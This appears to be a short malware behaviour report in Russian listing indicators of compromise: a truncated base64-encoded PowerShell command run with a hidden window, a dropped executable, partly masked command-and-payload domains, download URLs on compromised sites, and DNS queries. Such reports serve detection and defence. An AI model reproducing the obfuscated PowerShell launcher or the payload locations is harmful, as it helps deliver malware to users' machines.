Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAFcAVQBIAE8AYQBxAHQAPQAnAFoAVwBSAEcAVwBiAHQAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIAaQB0AGAAeQBgAFAAUgBvAFQAbwBDAGAAbwBMACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1968
- %TEMP%\970154.cvr
- %HOMEPATH%\463.exe
- %HOMEPATH%\463.exe
- 'sc###uganda.org':443
- 'du####teplumbing.ca':443
- 'na####metics.com':80
- 'ox##aus.com':80
- 'ox##aus.com':443
- http://www.na####metics.com/img/hvglv_hay_35sacodg/
- http://www.ox##aus.com/wp-admin/d8teb_n0v0h_dm0uyok/
- 'sc###uganda.org':443
- 'du####teplumbing.ca':443
- 'ox##aus.com':443
- DNS ASK li##ero.xyz
- DNS ASK sc###uganda.org
- DNS ASK du####teplumbing.ca
- DNS ASK na####metics.com
- DNS ASK ox##aus.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAFcAVQBIAE8AYQBxAHQAPQAnAFoAVwBSAEcAVwBiAHQAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIAaQB0AGAAeQBgAFAAUgBvAFQAbwBDAGAAbwBMACIAIAA9AC...' (со скрытым окном)